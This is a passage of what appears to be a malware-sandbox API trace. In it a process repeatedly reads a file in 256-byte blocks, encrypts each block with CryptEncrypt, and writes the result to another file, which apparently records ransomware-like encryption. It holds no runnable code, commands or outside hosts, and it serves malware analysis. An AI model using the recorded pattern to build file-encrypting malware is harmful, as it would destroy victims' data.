pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.051] GetLastError () returned 0x0 [0168.051] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.051] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.051] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.051] GetLastError () returned 0x0 [0168.051] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.051] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.051] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.051] GetLastError () returned 0x0 [0168.051] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.051] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.051] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.051] GetLastError () returned 0x0 [0168.051] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.051] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.051] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.051] GetLastError () returned 0x0 [0168.051] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.052] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.052] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.052] GetLastError () returned 0x0 [0168.052] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.052] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.052] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.052] GetLastError () returned 0x0 [0168.052] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.052] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.052] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.052] GetLastError () returned 0x0 [0168.052] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.052] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.052] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.052] GetLastError () returned 0x0 [0168.052] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.052] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.052] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.052] GetLastError () returned 0x0 [0168.052] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.052] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.052] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.052] GetLastError () returned 0x0 [0168.052] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.053] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.053] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.053] GetLastError () returned 0x0 [0168.053] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.053] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.053] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.053] GetLastError () returned 0x0 [0168.053] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.053] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.053] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.053] GetLastError () returned 0x0 [0168.053] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.053] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.053] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.053] GetLastError () returned 0x0 [0168.053] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.053] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.053] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.053] GetLastError () returned 0x0 [0168.053] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.053] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.053] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.053] GetLastError () returned 0x0 [0168.053] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.053] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.054] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.054] GetLastError () returned 0x0 [0168.054] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.054] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.054] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.054] GetLastError () returned 0x0 [0168.054] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.054] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.054] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.054] GetLastError () returned 0x0 [0168.054] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.054] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.054] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.054] GetLastError () returned 0x0 [0168.054] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.054] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.054] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.054] GetLastError () returned 0x0 [0168.054] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.055] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.055] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.055] GetLastError () returned 0x0 [0168.055] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.055] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.055] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.055] GetLastError () returned 0x0 [0168.055] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.055] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.055] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.055] GetLastError () returned 0x0 [0168.055] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.055] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.055] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.055] GetLastError () returned 0x0 [0168.055] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.055] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.055] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.055] GetLastError () returned 0x0 [0168.055] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.055] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.055] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.056] GetLastError () returned 0x0 [0168.056] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.056] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.056] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.056] GetLastError () returned 0x0 [0168.056] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.056] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.056] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.056] GetLastError () returned 0x0 [0168.056] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.056] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.056] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.056] GetLastError () returned 0x0 [0168.056] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.056] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.056] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.056] GetLastError () returned 0x0 [0168.056] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.056] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.057] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.057] GetLastError () returned 0x0 [0168.057] WriteFile (in: hFile=0x15c4, 